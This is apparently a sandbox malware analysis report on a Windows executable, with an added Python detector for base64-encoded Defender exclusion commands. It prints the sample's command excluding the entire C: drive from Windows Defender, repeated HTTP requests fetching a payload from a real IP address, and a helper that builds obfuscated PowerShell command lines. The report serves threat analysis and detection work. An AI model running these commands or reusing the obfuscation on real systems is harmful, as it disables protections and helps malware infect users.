
Windows Analysis Report
001.exe

Overview

General Information

Sample name: 001.exe
Analysis ID: 1652602
MD5: 0a0c875056017605d15ea70c51e5b561
SHA1: 9a6b6bda290438c62d1e22367c7db802a2508f48
SHA256: c6d95641d4c62cf6acb2788cfbaae43e16ed5b18c67b8f1094e31cf96b7550ce
Tags: exe, user-skocherhan

Detection

Score: 88
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to evade analysis by execution special instruction (VM detection)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 001.exe (PID: 7944 cmdline: "C:\Users\user\Desktop\001.exe" MD5: 0A0C875056017605D15EA70C51E5B561)
    • powershell.exe (PID: 7960 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5708 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\001.exe", ParentImage: C:\Users\user\Desktop\001.exe, ParentProcessId: 7944, ParentProcessName: 001.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7960, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\001.exe", ParentImage: C:\Users\user\Desktop\001.exe, ParentProcessId: 7944, ParentProcessName: 001.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7960, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\001.exe", ParentImage: C:\Users\user\Desktop\001.exe, ParentProcessId: 7944, ParentProcessName: 001.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7960, ProcessName: powershell.exe
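The three Sigma hits above all key on the same process-creation event: 001.exe spawning powershell.exe with Add-MpPreference -ExclusionPath C:\, a whole-drive Defender exclusion that the sample later withdraws again with Remove-MpPreference (PID 5708 in the process tree). The base64offset field modifier named in the match data is what lets a rule of this kind also catch the cmdlet when it is hidden inside -EncodedCommand. The Python below is an added example written for this page, not code from Joe Sandbox, the Sigma project or the sample: it implements three-alignment base64 matching and runs it over constructed process-creation events. The PIDs, field names and encoded command lines are made up for illustration; only the first event mirrors the report's process tree.

```python
import base64
from dataclasses import dataclass
from typing import Dict, List, Optional

# Cmdlets that alter Defender configuration.  base64 is case-sensitive, so every
# spelling PowerShell would accept (cmdlet names are case-insensitive) needs its
# own encoded variants; a production rule would enumerate more spellings.
MP_CMDLETS = ("Add-MpPreference", "Set-MpPreference",
              "add-mppreference", "set-mppreference")


def base64offset_variants(needle: bytes) -> List[str]:
    """Base64 encodings of `needle` for each of the three alignments it can have
    inside a larger plaintext (start offset 0, 1 or 2 mod 3), trimmed to the
    characters that depend only on the needle's own bytes.  A substring match on
    any variant finds the needle wherever it sits inside a base64 blob."""
    start = (0, 2, 3)        # leading chars contaminated by the bytes before the needle
    end = (None, -3, -2)     # trailing chars contaminated by the bytes after it
    out = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + needle).decode("ascii")
        out.append(enc[start[k]:end[(len(needle) + k) % 3]])
    return out


def encoded_indicators() -> Dict[str, str]:
    """Map each base64 variant back to the cmdlet it encodes.  -EncodedCommand
    wraps UTF-16LE text; the ASCII variants cover scripts that decode a base64
    string themselves."""
    table: Dict[str, str] = {}
    for cmdlet in MP_CMDLETS:
        for raw in (cmdlet.encode("utf-16-le"), cmdlet.encode("ascii")):
            for variant in base64offset_variants(raw):
                table[variant] = cmdlet
    return table


INDICATORS = encoded_indicators()


@dataclass
class Hit:
    process_id: int
    reason: str


def check_process_event(event: dict) -> Optional[Hit]:
    """Evaluate one process-creation event (Sysmon EID 1 / Security 4688 style
    dict with ProcessId and CommandLine)."""
    cmd = event.get("CommandLine", "")
    lowered = cmd.lower()
    # Clear-text form, as in the report: Add-MpPreference -ExclusionPath C:\
    for cmdlet in ("add-mppreference", "set-mppreference"):
        if cmdlet in lowered and "-exclusion" in lowered:
            return Hit(event["ProcessId"], f"clear-text {cmdlet} with an -Exclusion* parameter")
    # Encoded form: match the case-sensitive base64 against the original string.
    for variant, cmdlet in INDICATORS.items():
        if variant in cmd:
            return Hit(event["ProcessId"], f"base64-encoded {cmdlet}")
    return None


def make_encoded_command(script: str) -> str:
    """Build the command line an operator would use to hide the cmdlet."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -NoProfile -EncodedCommand {blob}"


def scan(events: List[dict]) -> List[Hit]:
    return [h for h in (check_process_event(e) for e in events) if h]


# Constructed sample events (not taken from the report's logs).
SAMPLE_EVENTS = [
    {"ProcessId": 7960, "ParentImage": r"C:\Users\user\Desktop\001.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPath C:\\"},
    {"ProcessId": 8001, "ParentImage": r"C:\Users\user\Desktop\001.exe",
     "CommandLine": make_encoded_command("$p='C:\\'; Add-MpPreference -ExclusionPath $p")},
    {"ProcessId": 8002, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-MpPreference"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"PID {hit.process_id}: {hit.reason}")
```

The trimming offsets are the part worth understanding: with one byte in front of the needle, the first two base64 characters mix that byte with the needle, with two bytes in front the first three do, and the tail is trimmed the same way depending on (length + offset) mod 3. Only the characters left after trimming are guaranteed to appear verbatim whatever surrounds the cmdlet, which is why all three variants are needed and why a plain base64 of the cmdlet alone misses two out of three placements.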
No Suricata rule has matched


AV Detection

Source: C:\Windows\Temp\1Qkj6qa_7944.sys; ReversingLabs: Detection: 33%
Source: 001.exe; Virustotal: Detection: 36%
Source: 001.exe; ReversingLabs: Detection: 33%
Source: Submitted Sample; Neural Call Log Analysis: 92.8%
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008782FC malloc,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,free, 1_2_008782FC
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008BF028 CryptGenRandom, 1_2_008BF028
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008BF078 CryptReleaseContext, 1_2_008BF078
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008671EA CryptAcquireContextA,CryptCreateHash, 1_2_008671EA
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008671E8 CryptAcquireContextA,CryptCreateHash, 1_2_008671E8
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_00867244 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 1_2_00867244
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_0086E4C4 CryptAcquireContextA,CryptCreateHash, 1_2_0086E4C4
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_00878478 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 1_2_00878478
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_0086E510 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 1_2_0086E510
Source: C:\Users\user\Desktop\001.exe; Code function: -----BEGIN PUBLIC KEY----- 1_2_0087F214
Source: C:\Users\user\Desktop\001.exe; Code function: -----BEGIN PUBLIC KEY----- 1_2_00853268
Source: 001.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: Binary string: J.Pdby source: 001.exe
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008935CC FindFirstFileA,FindNextFileA,FindClose, 1_2_008935CC
Source: C:\Users\user\Desktop\001.exe; Code function: 1_2_008B1C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 1_2_008B1C54
Source: Joe Sandbox View; IP Address: 104.168.28.10
Source: global traffic; HTTP traffic detected. Every request below goes to Host: 104.168.28.10 with User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 and Accept: */*; only the method and the Range header differ, and the requests are listed in the order the report records them, repeats included.
HEAD /001/01/d1 HTTP/1.1 Range: bytes=0-0
GET /001/01/d1 HTTP/1.1 Range: bytes=0-16383
GET /001/01/d1 HTTP/1.1 Range: bytes=32768-49151
GET /001/01/d1 HTTP/1.1 Range: bytes=65536-81919
GET /001/01/d1 HTTP/1.1 Range: bytes=49152-65535
GET /001/01/d1 HTTP/1.1 Range: bytes=114688-131071
GET /001/01/d1 HTTP/1.1 Range: bytes=16384-32767
GET /001/01/d1 HTTP/1.1 Range: bytes=98304-114687
GET /001/01/d1 HTTP/1.1 Range: bytes=81920-98303
GET /001/01/d1 HTTP/1.1 Range: bytes=131072-139263
GET /001/01/d1 HTTP/1.1 Range: bytes=139264-147455
GET /001/01/d1 HTTP/1.1 Range: bytes=147456-155647
GET /001/01/d1 HTTP/1.1 Range: bytes=155648-172031
GET /001/01/d1 HTTP/1.1 Range: bytes=172032-188415
GET /001/01/d1 HTTP/1.1 Range: bytes=188416-204799
GET /001/01/d1 HTTP/1.1 Range: bytes=204800-237567
GET /001/01/d1 HTTP/1.1 Range: bytes=188416-204799
GET /001/01/d1 HTTP/1.1 Range: bytes=172032-188415
GET /001/01/d1 HTTP/1.1 Range: bytes=237568-303103
GET /001/01/d1 HTTP/1.1 Range: bytes=172032-188415
GET /001/01/d1 HTTP/1.1 Range: bytes=188416-204799
GET /001/01/d1 HTTP/1.1 Range: bytes=303104-434175
GET /001/01/d1 HTTP/1.1 Range: bytes=434176-442367
GET /001/01/d1 HTTP/1.1 Range: bytes=442368-450559
GET /001/01/d1 HTTP/1.1 Range: bytes=450560-458751
GET /001/01/d1 HTTP/1.1 Range: bytes=458752-475135
GET /001/01/d1 HTTP/1.1 Range: bytes=475136-491519
GET /001/01/d1 HTTP/1.1 Range: bytes=491520-524287
GET /001/01/d1 HTTP/1.1 Range: bytes=524288-557055
GET /001/01/d1 HTTP/1.1 Range: bytes=557056-573439
GET /001/01/d1 HTTP/1.1 Range: bytes=573440-638975
GET /001/01/d1 HTTP/1.1 Range: bytes=638976-655359
GET /001/01/d1 HTTP/1.1 Range: bytes=655360-720895
GET /001/01/d1 HTTP/1.1 Range: bytes=720896-753663
GET /001/01/d1 HTTP/1.1 Range: bytes=753664-786431
GET /001/01/d1 HTTP/1.1 Range: bytes=655360-720895
GET /001/01/d1 HTTP/1.1 Range: bytes=786432-917503
GET /001/01/d1 HTTP/1.1 Range: bytes=917504-933887
GET /001/01/d1 HTTP/1.1 Range: bytes=933888-966655
GET /001/01/d1 HTTP/1.1 Range: bytes=966656-1032191
GET /001/01/d1 HTTP/1.1 Range: bytes=1032192-1048575
GET /001/01/d1 HTTP/1.1 Range: bytes=1048576-1114111
GET /001/01/d1 HTTP/1.1 Range: bytes=1114112-1122303
GET /001/01/d1 HTTP/1.1 Range: bytes=1122304-1130495
GET /001/01/d1 HTTP/1.1 Range: bytes=1114112-1122303
GET /001/01/d1 HTTP/1.1 Range: bytes=13116-16383
GET /001/01/d1 HTTP/1.1 Range: bytes=127798-131071
GET /001/01/d1 HTTP/1.1 Range: bytes=62264-65535
GET /001/01/d1 HTTP/1.1 Range: bytes=1130496-1163263
GET /001/01/d1 HTTP/1.1 Range: bytes=1163264-1196031
GET /001/01/d1 HTTP/1.1 Range: bytes=1196032-1212415
GET /001/01/d1 HTTP/1.1 Range: bytes=1212416-1245183
GET /001/01/d1 HTTP/1.1 Range: bytes=13116-16383
GET /001/01/d1 HTTP/1.1 Range: bytes=1245184-1249279
GET /001/01/d1 HTTP/1.1 Range: bytes=1249280-1314815
GET /001/01/d1 HTTP/1.1 Range: bytes=1314816-1380351
GET /001/01/d1 HTTP/1.1 Range: bytes=1380352-1388543
GET /001/01/d1 HTTP/1.1 Range: bytes=1388544-1396735
GET /001/01/d1 HTTP/1.1 Range: bytes=1396736-1429503
GET /001/01/d1 HTTP/1.1 Range: bytes=1429504-1560575
GET /001/01/d1 HTTP/1.1 Range: bytes=1560576-1691647
GET /001/01/d1 HTTP/1.1 Range: bytes=1691648-1708031
GET /001/01/d1 HTTP/1.1 Range: bytes=1708032-1740799
GET /001/01/d1 HTTP/1.1 Range: bytes=1740800-1757183
GET /001/01/d1 HTTP/1.1 Range: bytes=1757184-1773567
GET /001/01/d1 HTTP/1.1 Range: bytes=1773568-1806335
GET /001/01/d1 HTTP/1.1 Range: bytes=1806336-1871871
GET /001/01/d1 HTTP/1.1 Range: bytes=1871872-1888255
GET /001/01/d1 HTTP/1.1 Range: bytes=1888256-1921023
GET /001/01/d1 HTTP/1.1 Range: bytes=1921024-1937407
GET /001/01/d1 HTTP/1.1 Range: bytes=1937408-2002943
GET /001/01/d1 HTTP/1.1 Range: bytes=1871872-1888255
GET /001/01/d1 HTTP/1.1 Range: bytes=2002944-2035711
GET /001/01/d1 HTTP/1.1 Range: bytes=2035712-2166783
GET /001/01/d1 HTTP/1.1 Range: bytes=2166784-2297855
GET /001/01/d1 HTTP/1.1 Range: bytes=2297856-2330623
GET /001/01/d1 HTTP/1.1 Range: bytes=2330624-2363391
GET /001/01/d1 HTTP/1.1 Range: bytes=2363392-2428927
GET /001/01/d1 HTTP/1.1 Range: bytes=2428928-2445311
GET /001/01/d1 HTTP/1.1 Range: bytes=2445312-2453503
GET /001/01/d1 HTTP/1.1 Range: bytes=2453504-2486271
GET /001/01/d1 HTTP/1.1 Range: bytes=2486272-2551807
GET /001/01/d1 HTTP/1.1 Range: bytes=2551808-2617343
GET /001/01/d1 HTTP/1.1 Range: bytes=2617344-2633727
GET /001/01/d1 HTTP/1.1 Range: bytes=2633728-2637823
GET /001/01/d1 HTTP/1.1 Range: bytes=2637824-2670591
GET /001/01/d1 HTTP/1.1 Range: bytes=2670592-2703359
GET /001/01/d1 HTTP/1.1 Range: bytes=2703360-2719743
GET /001/01/d1 HTTP/1.1 Range: bytes=2719744-2727935
GET /001/01/d1 HTTP/1.1 Range: bytes=2727936-2760703
GET /001/01/d1 HTTP/1.1 Range: bytes=2760704-2826239
GET /001/01/d1 HTTP/1.1 Range: bytes=2826240-2842623
GET /001/01/d1 HTTP/1.1 Range: bytes=2842624-2875391
GET /001/01/d1 HTTP/1.1 Range: bytes=2875392-2891775
GET /001/01/d1 HTTP/1.1 Range: bytes=2891776-2924543
GET /001/01/d1 HTTP/1.1 Range: bytes=2924544-2940927
GET /001/01/d1 HTTP/1.1 Range: bytes=2940928-3006463
GET /001/01/d1 HTTP/1.1 Range: bytes=2940928-3006463
GET /001/01/d1 HTTP/1.1 Range: bytes=3006464-3022847
GET /001/01/d1 HTTP/1.1 Range: bytes=3022848-3055615
GET /001/01/d1 HTTP/1.1 Range: bytes=3055616-3088383
GET /001/01/d1 HTTP/1.1 Range: bytes=3088384-3096575
GET /001/01/d1 HTTP/1.1 Range: bytes=3096576-3112959
GET /001/01/d1 HTTP/1.1 Range: bytes=3112960-3121151
GET /001/01/d1 HTTP/1.1 Range: bytes=3121152-3137535
GET /001/01/d1 HTTP/1.1 Range: bytes=3137536-3153919
GET /001/01/d1 HTTP/1.1 Range: bytes=3153920-3170303
GET /001/01/d1 HTTP/1.1 Range: bytes=3170304-3174399
GET /001/01/d1 HTTP/1.1 Range: bytes=3174400-3207167
GET /001/01/d1 HTTP/1.1 Range: bytes=3207168-3215359
GET /001/01/d1 HTTP/1.1 Range: bytes=3170304-3174399
GET /001/01/d1 HTTP/1.1 Range: bytes=3215360-3231743
GET /001/01/d1 HTTP/1.1 Range: bytes=3231744-3239935
GET /001/01/d1 HTTP/1.1 Range: bytes=3239936-3248127
GET /001/01/d1 HTTP/1.1 Range: bytes=3248128-3280895
GET /001/01/d1 HTTP/1.1 Range: bytes=3280896-3289087
GET /001/01/d1 HTTP/1.1 Range: bytes=3289088-3305471
GET /001/01/d1 HTTP/1.1 Range: bytes=3305472-3321855
GET /001/01/d1 HTTP/1.1 Range: bytes=3321856-3338239
GET /001/01/d1 HTTP/1.1 Range: bytes=3338240-3354623
GET /001/01/d1 HTTP/1.1 Range: bytes=3354624-3371007
GET /001/01/d1 HTTP/1.1 Range: bytes=3371008-3403775
GET /001/01/d1 HTTP/1.1 Range: bytes=3403776-3411967
GET /001/01/d1 HTTP/1.1 Range: bytes=3411968-3420159
GET /001/01/d1 HTTP/1.1 Range: bytes=3420160-3452927
GET /001/01/d1 HTTP/1.1 Range: bytes=3371008-3403775
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3452928-3469311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3469312-3477503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3477504-3510271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3510272-3514367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3547136-3563519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3579904-3596287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3596288-3604479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3604480-3637247User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3637248-3641343User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3641344-3657727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3657728-3665919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3674112-3690495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3690496-3706879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3706880-3708927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3708928-3741695User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3758080-3790847User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3799040-3803135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3807232-3815423User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3815424-3823615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3823616-3839999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3840000-3856383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3856384-3860479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3860480-3868671User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3872768-3905535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3905536-3913727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3913728-3930111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3930112-3946495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
